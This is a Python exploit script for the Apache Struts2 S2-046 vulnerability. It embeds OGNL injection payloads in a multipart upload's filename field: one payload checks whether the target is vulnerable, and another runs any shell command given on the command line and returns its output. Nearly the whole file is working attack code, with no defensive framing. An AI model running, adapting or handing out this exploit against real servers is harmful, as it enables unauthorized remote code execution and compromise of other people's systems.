#!/usr/bin/env python
# -*- coding: utf-8 -*-
# python 2.0+/3.0+
# Time: 2020/08/05 22:57:34
# Contact: androllen#hotmail.com
import requests
import time
from copy import deepcopy
import sys
import json
HEADERS = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"
}
class S2_046():
def __init__(self, url, RESULT):
self.url = url
self.headers = HEADERS
self.RESULT = RESULT
self.check_poc = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=ENCODING')).(#res.getWriter().print('security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0b"
self.encoding = "UTF-8"
self.exec_payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=ENCODING')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('CMD'.toString().split('\\\\s'))).start().getInputStream()).useDelimiter('\\\\AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}\0b"
def poc(self):
if self.echo_check():
self.RESULT['success'] = True
else:
self.RESULT['success'] = False
return self.RESULT
def exp(self, command):
try:
paylaod = self.exec_payload.replace('CMD', command).replace('ENCODING', self.encoding)
html = post_file(self.url, paylaod, self.RESULT, self.headers, self.encoding)
if html:
self.RESULT['result'] = html.rstrip('\n')
self.RESULT['success'] = True
except Exception as e:
self.RESULT['error'] = str(e)
print(e)
finally:
return self.RESULT
def encode_multipart(exp):
"""创建multipart/form-data数据包"""
boundary = '----------%s' % hex(int(time.time() * 1000))
data = list()
data.append('--%s' % boundary)
content = b'x'
decoded_content = content.decode('ISO-8859-1')
data.append('Content-Disposition: form-data; name="test"; filename="{exp}"'.format(exp=exp))
data.append('Content-Type: text/plain\r\n')
data.append(decoded_content)
data.append('--%s--\r\n' % boundary)
return '\r\n'.join(data), boundary
def post_file(url, exp, RESULT, headers=None, encoding='UTF-8'):
"""S2-046漏洞专用"""
try:
payload , boundary = encode_multipart(exp)
heards = {'Content-Type': 'multipart/form-data; boundary=%s' % boundary}
resp = requests.post(url=url, data=payload.encode('ISO-8859-1'),headers=heards)
html = resp.text
return html
except Exception as e:
RESULT['error'] = str(e)
return False
def main(param):
RESULT = param.get('result', {})
try:
url = param.get('url', '')
cmd = param.get('cmd', 'whoami')
S2_046(url, RESULT).exp(cmd)
except Exception as e:
RESULT['error'] = str(e)
print(e)
finally:
return RESULT
if __name__ == "__main__":
#"url http://192.168.0.60:8083/ cmd whoami"
args_1 = sys.argv[1]
args_2 = sys.argv[2]
args_3 = sys.argv[3]
args_4 = sys.argv[4]
param = {
'url': args_2,
'cmd': args_4,
'result': {'success': False}
}
rec_json=json.dumps(main(param))
print(rec_json)